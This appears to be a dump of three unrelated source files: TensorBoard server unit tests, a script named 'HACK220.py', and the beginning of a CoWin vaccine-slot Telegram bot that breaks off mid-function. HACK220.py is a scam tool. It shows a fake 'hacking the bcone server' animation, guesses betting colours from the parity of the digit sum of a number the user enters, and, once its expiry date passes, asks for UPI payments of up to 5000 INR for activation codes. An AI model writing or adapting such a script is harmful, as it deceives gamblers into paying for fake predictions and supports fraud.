    self.assertEqual(response.status, 200, msg=path)
    self.assertEqual(
        response.getheader('Cache-Control'),
        'private, max-age=3600',
        msg=path)
    connection.close()
def testDataPaths_disableAllCaching(self):
  """Every /data endpoint should be served with caching disabled."""
  for path in ('/data/runs', '/data/logdir',
               '/data/scalars?run=run1&tag=simple_values',
               '/data/scalars?run=run1&tag=simple_values&format=csv',
               '/data/images?run=run1&tag=image',
               '/data/individualImage?run=run1&tag=image&index=0',
               '/data/audio?run=run1&tag=audio',
               '/data/run_metadata?run=run1&tag=test%20run'):
    # Fresh connection per path so stale keep-alive state can't interfere.
    connection = http_client.HTTPConnection('localhost',
                                            self._server.server_address[1])
    connection.request('GET', path)
    response = connection.getresponse()
    self.assertEqual(response.status, 200, msg=path)
    # 'Expires: 0' instructs clients not to cache the response.
    self.assertEqual(response.getheader('Expires'), '0', msg=path)
    # Drain the body so the connection can be reused/closed cleanly.
    response.read()
    connection.close()
def testHistograms(self):
  """Test the format of /data/histograms."""
  # Expected: [[wall_time, step, [min, max, num, sum, sum_squares,
  #                               bucket_limits, bucket_counts]]]
  self.assertEqual(
      self._getJson('/data/histograms?tag=histogram&run=run1'),
      [[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testImages(self):
  """Test listing images and retrieving an individual image."""
  image_json = self._getJson('/data/images?tag=image&run=run1')
  image_query = image_json[0]['query']
  # We don't care about the format of the image query.
  del image_json[0]['query']
  self.assertEqual(image_json, [{
      'wall_time': 0,
      'step': 0,
      'height': 1,
      'width': 1
  }])
  # The query returned by the listing must resolve to a fetchable image.
  response = self._get('/data/individualImage?%s' % image_query)
  self.assertEqual(response.status, 200)
def testAudio(self):
  """Test listing audio and retrieving an individual audio clip."""
  audio_json = self._getJson('/data/audio?tag=audio&run=run1')
  audio_query = audio_json[0]['query']
  # We don't care about the format of the audio query.
  del audio_json[0]['query']
  self.assertEqual(audio_json, [{
      'wall_time': 0,
      'step': 0,
      'content_type': 'audio/wav'
  }])
  # The query returned by the listing must resolve to a fetchable clip.
  response = self._get('/data/individualAudio?%s' % audio_query)
  self.assertEqual(response.status, 200)
def testGraph(self):
  """Test retrieving the graph definition."""
  response = self._get('/data/graph?run=run1&limit_attr_size=1024'
                       '&large_attrs_key=_very_large_attrs')
  self.assertEqual(response.status, 200)
  graph_pbtxt = response.read()
  # Parse the graph from pbtxt into a graph message.
  graph = graph_pb2.GraphDef()
  graph = text_format.Parse(graph_pbtxt, graph)
  self.assertEqual(len(graph.node), 2)
  self.assertEqual(graph.node[0].name, 'a')
  self.assertEqual(graph.node[1].name, 'b')
  # Make sure the second node has an attribute that was filtered out because
  # it was too large and was added to the "too large" attributes list.
  self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
  self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
                   [b'very_large_attr'])
def testAcceptGzip_compressesResponse(self):
  """A client advertising gzip support should get a gzipped graph."""
  response = self._get('/data/graph?run=run1&limit_attr_size=1024'
                       '&large_attrs_key=_very_large_attrs',
                       {'Accept-Encoding': 'gzip'})
  self.assertEqual(response.status, 200)
  self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
  # Decompress and verify the payload is still a valid 2-node graph.
  pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
  graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
  self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
  """An 'Accept-Encoding: *' wildcard should also yield gzip."""
  response = self._get('/data/graph?run=run1&limit_attr_size=1024'
                       '&large_attrs_key=_very_large_attrs',
                       {'Accept-Encoding': '*'})
  self.assertEqual(response.status, 200)
  self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
  pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
  graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
  self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
  """An unknown encoding must fall back to an uncompressed response."""
  response = self._get('/data/graph?run=run1&limit_attr_size=1024'
                       '&large_attrs_key=_very_large_attrs',
                       {'Accept-Encoding': 'doodle'})
  self.assertEqual(response.status, 200)
  self.assertIsNone(response.getheader('Content-Encoding'))
  graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
  self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
  """Images are already compressed; they must be served raw even when the
  client advertises gzip support."""
  response = self._get('/data/individualImage?run=run1&tag=image&index=0',
                       {'Accept-Encoding': 'gzip'})
  self.assertEqual(response.status, 200)
  # assertIsNone for consistency with the other encoding tests above
  # (the original used assertEqual(..., None)).
  self.assertIsNone(response.getheader('Content-Encoding'))
def testRunMetadata(self):
  """Test retrieving the run metadata information."""
  response = self._get('/data/run_metadata?run=run1&tag=test%20run')
  self.assertEqual(response.status, 200)
  run_metadata_pbtxt = response.read()
  # Parse from pbtxt into a message.
  run_metadata = config_pb2.RunMetadata()
  text_format.Parse(run_metadata_pbtxt, run_metadata)
  # Matches the single device stat written by _GenerateTestData.
  self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
  self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
  """Generates the test data directory.

  The test data has a single run named run1 which contains:
   - a histogram
   - an image at timestamp and step 0
   - scalar events containing the value i at step 10 * i and wall time
     100 * i, for i in [1, _SCALAR_COUNT).
   - a graph definition

  Returns:
    temp_dir: The directory the test data is generated under.
  """
  temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
  self.addCleanup(shutil.rmtree, temp_dir)
  run1_path = os.path.join(temp_dir, 'run1')
  os.makedirs(run1_path)
  writer = writer_lib.FileWriter(run1_path)
  histogram_value = summary_pb2.HistogramProto(
      min=0,
      max=2,
      num=3,
      sum=6,
      sum_squares=5,
      bucket_limit=[0, 1, 2],
      bucket=[1, 1, 1])
  # Add a simple graph event.
  graph_def = graph_pb2.GraphDef()
  node1 = graph_def.node.add()
  node1.name = 'a'
  node2 = graph_def.node.add()
  node2.name = 'b'
  node2.attr['very_large_attr'].s = b'a' * 2048  # 2 KB attribute
  meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
  # Either path must produce the same /data/graph result (see the
  # metagraph-only subclass below).
  if self._only_use_meta_graph:
    writer.add_meta_graph(meta_graph_def)
  else:
    writer.add_graph(graph_def)
  # Add a simple run metadata event.
  run_metadata = config_pb2.RunMetadata()
  device_stats = run_metadata.step_stats.dev_stats.add()
  device_stats.device = 'test device'
  writer.add_run_metadata(run_metadata, 'test run')
  # 1x1 transparent GIF.
  encoded_image = base64.b64decode(
      'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
  image_value = summary_pb2.Summary.Image(
      height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
  audio_value = summary_pb2.Summary.Audio(
      sample_rate=44100,
      length_frames=22050,
      num_channels=2,
      encoded_audio_string=b'',
      content_type='audio/wav')
  writer.add_event(
      event_pb2.Event(
          wall_time=0,
          step=0,
          summary=summary_pb2.Summary(value=[
              summary_pb2.Summary.Value(
                  tag='histogram', histo=histogram_value),
              summary_pb2.Summary.Value(
                  tag='image', image=image_value), summary_pb2.Summary.Value(
                      tag='audio', audio=audio_value)
          ])))
  # Write 100 simple values.
  # NOTE(review): `xrange` implies Python 2 or a six.moves import outside
  # this view — confirm before porting.
  for i in xrange(1, self._SCALAR_COUNT + 1):
    writer.add_event(
        event_pb2.Event(
            # We use different values for wall time, step, and the value so we
            # can tell them apart.
            wall_time=100 * i,
            step=10 * i,
            summary=summary_pb2.Summary(value=[
                summary_pb2.Summary.Value(
                    tag='simple_values', simple_value=i)
            ])))
  writer.flush()
  writer.close()
  return temp_dir
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
  """Re-runs every server test with the graph supplied via MetaGraphDef."""
  # Tests new ability to use only the MetaGraphDef
  _only_use_meta_graph = True  # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
  """Tests for application.parse_event_files_spec.

  The spec is a comma-separated list of `[run_name:]path` entries; the
  parser returns a {path: run_name_or_None} dict.
  """

  def testRunName(self):
    logdir = 'lol:/cat'
    expected = {'/cat': 'lol'}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
    logdir = '/lol:/cat'
    expected = {'/lol:/cat': None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testMultipleDirectories(self):
    logdir = '/a,/b'
    expected = {'/a': None, '/b': None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testNormalizesPaths(self):
    logdir = '/lol/.//cat/../cat'
    expected = {'/lol/cat': None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testAbsolutifies(self):
    # Relative local paths are resolved against the working directory.
    logdir = 'lol/cat'
    expected = {os.path.realpath('lol/cat'): None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testRespectsGCSPath(self):
    logdir = 'gs://foo/path'
    expected = {'gs://foo/path': None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testRespectsHDFSPath(self):
    logdir = 'hdfs://foo/path'
    expected = {'hdfs://foo/path': None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testDoesNotExpandUserInGCSPath(self):
    logdir = 'gs://~/foo/path'
    expected = {'gs://~/foo/path': None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testDoesNotNormalizeGCSPath(self):
    # Remote URLs must be passed through verbatim.
    logdir = 'gs://foo/./path//..'
    expected = {'gs://foo/./path//..': None}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)

  def testRunNameWithGCSPath(self):
    logdir = 'lol:gs://foo/path'
    expected = {'gs://foo/path': 'lol'}
    self.assertEqual(application.parse_event_files_spec(logdir), expected)
class TensorBoardAssetsTest(test.TestCase):
  """Sanity check that packaged static assets are present."""

  def testTagFound(self):
    # The TAG resource must exist and be non-empty.
    tag = resource_loader.load_resource('tensorboard/TAG')
    self.assertTrue(tag)
if __name__ == '__main__':
  # Run all test cases via the TensorFlow test runner.
  test.main()
|
HACK220.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
# Hard kill-switch: after this date the script shows the "expired" flow.
expirydate = datetime.date(2021, 9, 24)
today=date.today()
# ANSI escape sequences for coloured terminal output.
green="\033[3;32m"
neon="\033[3;36m"
nc="\033[00m"
red="\033[3;31m"
purple="\033[3;34m"
yellow="\033[3;33m"
voilet="\033[3;35m"
def hero():
    """Run the interactive "prediction" loop.

    Reads the module-level global ``period`` (set by the caller before
    invoking hero), repeatedly asks the user for the current price, shows a
    fake 20-second progress animation, and prints a RED/GREEN guess based on
    the parity of the price's digit sum. Exits after 12 rounds via sys.exit,
    or when the user answers "0" to the continue prompt.
    """

    def chalo():
        # Spinner shown while "hacking the server" (~20 s busy-wait).
        done = False

        def animate():
            for c in itertools.cycle(['|', '/', '-', '\\']):
                if done:
                    break
                sys.stdout.write('\rhacking in the bcone server for next colour--------- ' + c)
                sys.stdout.flush()
                time.sleep(0.1)
            sys.stdout.write('\rDone! ')

        t = threading.Thread(target=animate)
        t.start()
        time.sleep(20)
        done = True

    def chalo1():
        # Second spinner ("getting the colour"), same mechanics as chalo().
        done = False

        def animate():
            for c in itertools.cycle(['|', '/', '-', '\\']):
                if done:
                    break
                sys.stdout.write('\rgetting the colour wait --------- ' + c)
                sys.stdout.flush()
                time.sleep(0.1)
            sys.stdout.write('\rDone! ')

        t = threading.Thread(target=animate)
        t.start()
        time.sleep(20)
        done = True

    def clear():
        # Clear the terminal on Windows ('nt') or POSIX.
        if name == 'nt':
            _ = system('cls')
        else:
            _ = system('clear')

    def getSum(n):
        # Sum of the decimal digits of n.
        total = 0
        for digit in str(n):
            total += int(digit)
        return total

    clear()
    playing = True
    newperiod = period  # `period` is a module-level global set by the caller
    banner = 'figlet RXCEV2.1|lolcat'
    numbers = []
    while playing:
        clear()
        system(banner)
        print(f"{red}Contact me on telegram @hackmgk")
        print(f"{yellow}Enter ", newperiod, " Bcone Price :")
        current = int(input())
        chalo()
        print("\n---------Successfully hacked the server-----------")
        chalo1()
        print("\n---------Successfully got the colour -------------")
        print('\n')
        # Both parities of `newperiod` used identical logic in the original,
        # so the duplicated if/else collapses to one digit-sum parity check.
        if getSum(current) % 2 == 0:
            print(newperiod + 1, " : 🔴, RED")
        else:
            print(newperiod + 1, " : 🟢, GREEN")
        newperiod += 1
        numbers.append(current)
        playing = input("Do you want to play : Press 1 and 0 to exit \n")
        # BUG FIX: input() returns a string, so the original `y == 0`
        # comparison was never true and entering 0 did not exit the loop.
        if playing == "0":
            playing = False
        if len(numbers) > 11:
            clear()
            system('figlet Thank you!!')
            print("Play on next specified time!!")
            print("-----------Current Time UP----------")
            sys.exit(" \n \n \n Contact on Telegram @hackmgk")
# Entry flow: before the expiry date the user may play in fixed time windows;
# afterwards they are funneled into the "activation code" payment loop below.
if(expirydate>today):
    now = datetime.datetime.now()
    # Time windows for the daily "play sessions".
    First = now.replace(hour=13, minute=55, second=0, microsecond=0)
    Firstend = now.replace(hour=14, minute=35, second=0, microsecond=0)
    Second = now.replace(hour=16, minute=25, second=0, microsecond=0)
    Secondend = now.replace(hour=17, minute=35, second=0, microsecond=0)
    Third = now.replace(hour=15, minute=55, second=0, microsecond=0)
    Thirdend = now.replace(hour=16, minute=35, second=0, microsecond=0)
    Final = now.replace(hour=17, minute=55, second=0, microsecond=0)
    Finalend = now.replace(hour=18, minute=35, second=0, microsecond=0)
    if (now>Third and now<Thirdend):
        period=320
        hero()
    # NOTE(review): `elif(now)` is always truthy, so this branch fires
    # whenever the Third window doesn't; the two `elif(False)` branches and
    # the final else are unreachable dead code — confirm intent.
    elif(now):
        period=340
        hero()
    elif(False):
        period=340
        hero()
    elif(False):
        period=360
        hero()
    else:
        banner='figlet RXCEV2.1'
        system(banner)
        print("Hi! thanks for trying our DEMO")
        print("----------Your play time-----------")
        print("23rd Sept 2021, 04:00 PM- 04:30 PM")
        print("Please play on the given time, and ")
        print("If you think it is an error contact")
        print("   admin on telegram @hackmgk      ")
else:
    # Expired: show payment instructions and loop until a valid
    # "activation code" is entered.
    def clear():
        # for windows
        if name == 'nt':
            _ = system('cls')
        # for mac and linux(here, os.name is 'posix')
        else:
            _ = system('clear')
    # Hard-coded activation codes accepted below.
    code="BHFGV985"
    code1="NJHBWE23"
    code2="MKAAHDBD4"
    test="BHGFV43"
    night="NICMJY13"
    nextday="NNMKJHFD"
    banner='figlet RXCEV2.1|lolcat'
    rava=0
    now = datetime.datetime.now()
    # Pick the starting period number based on the current time window.
    Second = now.replace(hour=10, minute=55, second=0, microsecond=0)
    Secondend = now.replace(hour=14, minute=55, second=0, microsecond=0)
    Third = now.replace(hour=15, minute=30, second=0, microsecond=0)
    Thirdend = now.replace(hour=18, minute=34, second=0, microsecond=0)
    Final = now.replace(hour=18, minute=35, second=0, microsecond=0)
    Finalend = now.replace(hour=22, minute=35, second=0, microsecond=0)
    if(now>Second and now<Secondend):
        rava=290
    elif(now>Third and now<Thirdend):
        rava=350
    elif(now>Final and now<Finalend):
        rava=410
    system(banner)
    print(f"{neon}*--------*--------*-------*---------*---------*")
    print("Your hack has expired--- Please contact")
    print(" on telegram ----@hackmgk for activating")
    print("    Plan Amount -- Total limit     " )
    print(" 1. 1000 INR ------- 1 Day (30 Games")
    print(" 2. 2500 INR ------- 3 Days(90 Games")
    print(" 2. 5000 INR ------- 7 Days(210 Games")
    print("*---------*----------*-------------*----------*")
    print("If you need any discount contact me")
    print("Beware of fraudsters!!!")
    while(True):
        print("My banking name is MUKESH")
        print(f"{red}After You Pay to The UPI ID above You Can Automatically")
        print(f"Activate Hack By Entering The Correct ")
        print(f"{green}(UTR) Or Upi Reference Number")
        print(f"{neon}To Activate The Hack")
        print(f"If It Does'nt Open Contact Me On Telegram {yellow}@hackmgk")
        print(f"{neon}*---------*----------*-------------*----------*")
        print(f"{red}*---------*----------*-------------*----------*")
        print("payhere--- UPI : ")
        print(f"{yellow}UPI1 : mkeditor778@ybl")
        print("UPI2 : mkeditor778@axl")
        print("If you have already paid to above UPI")
        print(f"{neon}Enter Your Activation Code Or Upi Reference for Opening Hack")
        bhai=input(": ")
        if(bhai==code or bhai==test or bhai==code1 or bhai==code2):
            clear()
            print("You have bought hack for 1 day")
            print(f"{purple}---------------Your play time----------------")
            print("19th Jan 2021, 02:30 PM- 03:00 PM")
            print("19th Jan 2021, 05:30 PM- 06:00 PM")
            print("19th Jan 2021, 08:30 PM- 09:00 PM")
            print("Please play on the given time, and ")
            print(f"If you think it is an {red}error {yellow}contact {green}me ")
            print(f"{neon}On Telegram {red}@hackmgk")
            print("wait.... starting....")
            time.sleep(20)
            # NOTE(review): `rava` stays 0 outside every time window, so
            # hero() would start from period 0 — confirm intended.
            period=rava
            hero()
            sys.exit(" \n \n \n Contact on Telegram @hackmgk")
        elif(bhai==nextday):
            clear()
            banner='figlet RXCEV2.1|lolcat'
            system(banner)
            print("----------Your play time-----------")
            print("8th-14th Dec 2021, 02:30 PM- 03:00 PM")
            print("8th-14th Dec 2021, 06:00 PM- 06:30 PM")
            print("8th-14th Dec 2021, 08:30 PM- 09:00 PM")
            print("Please play on the given time, and ")
            print("If you think it is an error contact")
            print("wait.... starting....")
            time.sleep(20)
            period=rava
            hero()
            sys.exit(" \n \n \n Contact on Telegram @hackmgk")
        elif(bhai==night):
            clear()
            print("----------Your play time-----------")
            print("9th Dec 2021, 08:30 PM- 09:00 PM")
            print("10th Dec 2021, 08:30 PM- 09:00 PM")
            print("11th Dec 2021, 08:30 PM- 09:00 PM")
            print("Please play on the given time, and ")
            print("If you think it is an error contact")
            print("wait.... starting....")
            time.sleep(20)
            period=410
            hero()
            sys.exit(" \n \n \n Contact on Telegram @hackmgk")
        else:
            clear()
            banner='figlet RXCEV2.1|lolcat'
            system(banner)
            print("Incorrect Activation Code :")
|
main.py | import logging
import re
import time
from copy import deepcopy
from enum import Enum
from typing import List, Optional
from datetime import datetime
import threading
import traceback
import html
import json
import peewee
import telegram.error
from telegram import (
Update,
InlineKeyboardMarkup,
InlineKeyboardButton,
Bot,
MAX_MESSAGE_LENGTH,
BotCommand,
ParseMode,
)
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackContext,
CallbackQueryHandler,
)
from jinja2 import Template
from peewee import (
SqliteDatabase,
Model,
DateTimeField,
CharField,
FixedCharField,
IntegerField,
BooleanField,
)
from cowinapi import CoWinAPI, VaccinationCenter, CoWinTooManyRequests
from settings import TELEGRAM_BOT_TOKEN, DEVELOPER_CHAT_ID, SQLITE_DB_PATH
# Regexes used to route free-text messages and button callback data.
PINCODE_PREFIX_REGEX = r"^\s*(pincode)?\s*(?P<pincode_mg>\d+)\s*"
AGE_BUTTON_REGEX = r"^age: (?P<age_mg>\d+)"
CMD_BUTTON_REGEX = r"^cmd: (?P<cmd_mg>.+)"
# NOTE(review): alternation is un-grouped, so only 'disable' is anchored to
# the surrounding \s* — probably intended as r"\s*(disable|stop|pause)\s*".
DISABLE_TEXT_REGEX = r"\s*disable|stop|pause\s*"
# All the really complex configs:
# Following says, how often we should poll CoWin APIs for age group 18+. In seconds
MIN_18_WORKER_INTERVAL = 60
# Following says, how often we should poll CoWin APIs for age group 45+. In seconds
MIN_45_WORKER_INTERVAL = 60 * 10  # 10 minutes
# Following decides, should we send a notification to user about 45+ or not.
# If we have sent an alert in the last 30 minutes, we will not bother them
MIN_45_NOTIFICATION_DELAY = 60 * 30
# Whenever an exception occurs, we sleep for these many seconds hoping things will be fine
# when we wake up. This surprisingly works most of the times.
EXCEPTION_SLEEP_INTERVAL = 10
# the amount of time we sleep in background workers whenever we hit their APIs
COWIN_API_DELAY_INTERVAL = 180  # 3 minutes
# the amount of time we sleep when we get 403 from CoWin
LIMIT_EXCEEDED_DELAY_INTERVAL = 60 * 5  # 5 minutes
# Enable logging
logging.basicConfig(
    format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
# Single shared CoWin API client for the whole process.
CoWinAPIObj = CoWinAPI()
# SQLite in WAL mode so the bot handlers and background workers can
# read/write concurrently.
db = SqliteDatabase(
    SQLITE_DB_PATH,
    pragmas={
        "journal_mode": "wal",
        "cache_size": -1 * 64000,  # 64MB
        "foreign_keys": 1,
        "ignore_check_constraints": 0,
    },
)
class AgeRangePref(Enum):
    """User's vaccination age-group preference.

    Unknown means the user has not chosen yet; MinAgeAny means both
    18+ and 45+ groups.
    """

    Unknown = 0
    MinAge18 = 1
    MinAge45 = 2
    MinAgeAny = 3

    def __str__(self) -> str:
        # Human-readable label. Unknown deliberately falls through to
        # "Both", matching the original if/elif/else chain.
        labels = {
            AgeRangePref.MinAge18: "18+",
            AgeRangePref.MinAge45: "45+",
        }
        return labels.get(self, "Both")
class EnumField(IntegerField):
    """Peewee field that persists an Enum member as its integer value.

    `choices` is the Enum class used to convert between Python members and
    their stored integer values.
    """

    def __init__(self, choices, *args, **kwargs):
        # BUG FIX: the original called super(IntegerField, self).__init__,
        # which skips IntegerField's own initializer in the MRO. Use the
        # cooperative zero-argument form instead.
        super().__init__(*args, **kwargs)
        self.choices = choices

    def db_value(self, value):
        # Python -> DB: store the enum member's integer value.
        return value.value

    def python_value(self, value):
        # DB -> Python: reconstruct the enum member from the stored int.
        return self.choices(value)
# storage classes
class User(Model):
    """A Telegram user subscribed to vaccination-slot alerts."""

    created_at = DateTimeField(default=datetime.now)
    updated_at = DateTimeField(default=datetime.now)
    # Soft delete: /delete sets this instead of removing the row.
    deleted_at = DateTimeField(null=True)
    # Used to rate-limit 45+ notifications (MIN_45_NOTIFICATION_DELAY).
    last_alert_sent_at: datetime = DateTimeField(default=datetime.now)
    total_alerts_sent = IntegerField(default=0)
    telegram_id = CharField(max_length=220, unique=True)
    chat_id = CharField(max_length=220)
    # 6-digit area pincode monitored for this user; null until set.
    pincode: str = FixedCharField(max_length=6, null=True, index=True)
    age_limit: AgeRangePref = EnumField(
        choices=AgeRangePref, default=AgeRangePref.Unknown
    )
    # Whether alert notifications are currently on for this user.
    enabled = BooleanField(default=False, index=True)

    class Meta:
        database = db
def sanitise_msg(msg: str) -> str:
    """
    Telegram messages can't be more than `MAX_MESSAGE_LENGTH` bytes. So, this method truncates the message body
    with appropriate size and adds a footer saying message was truncated.
    CAUTION: This does a really naive truncation which might end up breaking a valid markdown / html to an invalid one
    and Telegram will reject that message.
    """
    # `<=`: a message exactly at the limit is still valid; the original `<`
    # needlessly truncated that boundary case.
    if len(msg) <= MAX_MESSAGE_LENGTH:
        return msg
    help_text = "\n\n (message truncated due to size)"
    msg_length = MAX_MESSAGE_LENGTH - len(help_text)
    return msg[:msg_length] + help_text
def get_main_buttons() -> List[InlineKeyboardButton]:
    """Primary action buttons; callback data is routed by CMD_BUTTON_REGEX."""
    return [
        InlineKeyboardButton("🔔 Setup Alert", callback_data="cmd: setup_alert"),
        InlineKeyboardButton("🔍 Check Open Slots", callback_data="cmd: check_slots"),
    ]
def get_age_kb() -> InlineKeyboardMarkup:
    """Build the single-row inline keyboard for picking an age preference.

    Callback data values match AgeRangePref integer values and are routed
    by AGE_BUTTON_REGEX.
    """
    row = [
        InlineKeyboardButton(label, callback_data=f"age: {value}")
        for label, value in (("18+", 1), ("45+", 2), ("Both", 3))
    ]
    return InlineKeyboardMarkup([row])
def get_main_keyboard() -> InlineKeyboardMarkup:
    """Full two-row start keyboard: main actions plus help/privacy links."""
    return InlineKeyboardMarkup(
        [
            [*get_main_buttons()],
            [
                InlineKeyboardButton("💡 Help", callback_data="cmd: help"),
                InlineKeyboardButton("🔒 Privacy Policy", callback_data="cmd: privacy"),
            ],
        ]
    )
def start(update: Update, _: CallbackContext) -> None:
    """
    Handles /start, the very first message the user gets whenever they start interacting with this bot
    """
    msg = """Hey there!👋
Welcome to Covid19 Vaccine India Assist bot.
It will weekly check slots availability in your area and alert you when one becomes available. To start either click
🔔 *Setup Alert* or 🔍 *Check Open Slots*.
If you are a first time user it will ask for your age and pincode."""
    update.message.reply_text(
        msg, reply_markup=get_main_keyboard(), parse_mode="markdown"
    )
def cmd_button_handler(update: Update, ctx: CallbackContext) -> None:
    """
    Whenever we send buttons to user, we also include callback data. For commands, we usually send the data in the form
    of `cmd: <cmd_name>`. Check `get_main_buttons` or `get_main_keyboard` methods to see how the data is sent.
    When user clicks on those buttons, we also get the callback data. Following figures out appropriate command to run
    """
    query = update.callback_query
    query.answer()
    cmd = ctx.match.groupdict().get("cmd_mg")
    if not cmd:
        return
    # Dispatch table instead of an if/elif chain; unknown commands get the
    # same fallback message as before.
    handlers = {
        "setup_alert": setup_alert_command,
        "check_slots": check_slots_command,
        "privacy": privacy_policy_handler,
        "help": help_handler,
    }
    handler = handlers.get(cmd.strip())
    if handler is None:
        update.effective_chat.send_message("cmd not implemented yet")
        return
    handler(update, ctx)
def get_help_text_short() -> str:
    """One-paragraph summary shown at the top of the help message."""
    return """This bot will help you to check current available slots in one week and also, alert you when one becomes available. To start, either click on "Setup Alert" or "Check Open Slots". For first time users, bot will ask for age preference and pincode."""  # noqa
def get_help_text() -> str:
    """Detailed markdown help body describing every command."""
    return """\n\n*Setup Alert*\nUse this to setup an alert, it will send a message as soon as a slot becomes available. Select the age preference and provide the area pincode of the vaccination center you would like to monitor. Do note that 18+ slots are monitored more often than 45+. Click on /pause to stop alerts and /resume to enable them back.\n\n*Check Open Slots*\nUse this to check the slots availability manually.\n\n*Age Preference*\nTo change age preference, click on /age\n\n*Pincode*\nClick on /pincode to change the pincode. Alternatively, you can send pincode any time and bot will update it.\n\n*Delete*\nClick on /delete if you would like delete all your information."""  # noqa
def help_handler(update: Update, _: CallbackContext):
    """Send the composed help message with the main action buttons."""
    header = "💡 Help\n\n"
    msg = header + get_help_text_short() + get_help_text()
    update.effective_chat.send_message(
        msg,
        parse_mode="markdown",
        reply_markup=InlineKeyboardMarkup([[*get_main_buttons()]]),
    )
def delete_cmd_handler(update: Update, _: CallbackContext):
    """Handle /delete: soft-delete the user's row and wipe preferences."""
    user: User
    try:
        # Only consider rows not already soft-deleted.
        user = User.get(
            User.telegram_id == update.effective_user.id, User.deleted_at.is_null(True)
        )
    except peewee.DoesNotExist:
        update.effective_chat.send_message("No data exists to delete.")
        return
    # Soft delete: mark deleted and clear all stored preferences.
    user.deleted_at = datetime.now()
    user.enabled = False
    user.pincode = None
    user.age_limit = AgeRangePref.Unknown
    user.save()
    update.effective_chat.send_message(
        "Your data has been successfully deleted. Click on /start to restart the bot."
    )
def help_command(update: Update, ctx: CallbackContext) -> None:
    """/help command entry point; delegates to the shared help handler."""
    help_handler(update, ctx)
def privacy_policy_handler(update: Update, _: CallbackContext):
    """Send the privacy policy, interpolating the user's Telegram id."""
    header = "🔒 Privacy Policy\n\n"
    msg = (
        f"Covid19 Assist Bot stores minimal and only the information which is necessary. This includes:\n"
        " • Telegram account user id ({id})\n"
        " • The pincode to search in CoWin site\n"
        " • Age preference\n"
        "\nThe bot *does not have access* to your real name or phone number."
        "\n\nClick on /delete to delete all your data."
    )
    msg = header + msg.format(id=update.effective_user.id)
    update.effective_chat.send_message(msg, parse_mode="markdown")
def age_command(update: Update, _: CallbackContext):
    """Prompt the user to pick an age preference via the inline keyboard."""
    chat = update.effective_chat
    chat.send_message("Select your age preference", reply_markup=get_age_kb())
def pincode_command(update: Update, _: CallbackContext):
    """Prompt the user to send their pincode (captured by PINCODE_PREFIX_REGEX)."""
    update.effective_chat.send_message("Enter your pincode")
def check_if_preferences_are_set(
    update: Update, ctx: CallbackContext
) -> Optional[User]:
    """
    Checks if preferences for the current user are set or not. If not set, asks them to set. If they are set, then
    returns the `User` object from DB.

    Returns None (after prompting the user) when the age preference or
    pincode is still missing.
    """
    user: User
    user, _ = get_or_create_user(
        telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
    )
    if user.age_limit is None or user.age_limit == AgeRangePref.Unknown:
        age_command(update, ctx)
        return
    if user.pincode is None:
        pincode_command(update, ctx)
        return
    return user
def setup_alert_command(update: Update, ctx: CallbackContext) -> None:
    """Enable slot alerts for this user, prompting for preferences if unset."""
    user = check_if_preferences_are_set(update, ctx)
    if not user:
        return
    user.enabled = True
    user.save()
    msg = "🔔 I have setup alerts for you. "
    msg_18 = "For age group 18+, as soon as a slot becomes available I will send you a message. "
    # BUG FIX: the original text said "every 15 minutes", contradicting the
    # actual worker cadence (MIN_45_WORKER_INTERVAL = 10 minutes).
    msg_45 = (
        "For age group 45+, I will check slots availability for every 10 minutes and send a message if they are "
        "available. "
    )
    # Tailor the explanation to the user's age preference.
    if user.age_limit == AgeRangePref.MinAge18:
        msg = msg + msg_18
    elif user.age_limit == AgeRangePref.MinAge45:
        msg = msg + msg_45
    else:
        msg = msg + msg_18 + msg_45
    update.effective_chat.send_message(msg + "\n\nClick on /pause to pause the alerts.")
def disable_alert_command(update: Update, _: CallbackContext) -> None:
    """Handle /pause: turn off alert notifications for this user."""
    user: User
    user, _ = get_or_create_user(
        telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
    )
    user.enabled = False
    user.save()
    update.effective_chat.send_message(
        "🔕 I have disabled the Alerts. Click on /resume to resume the alerts"
    )
def get_available_centers_by_pin(pincode: str) -> List[VaccinationCenter]:
    """Query CoWin for this pincode and keep only centers with open sessions."""
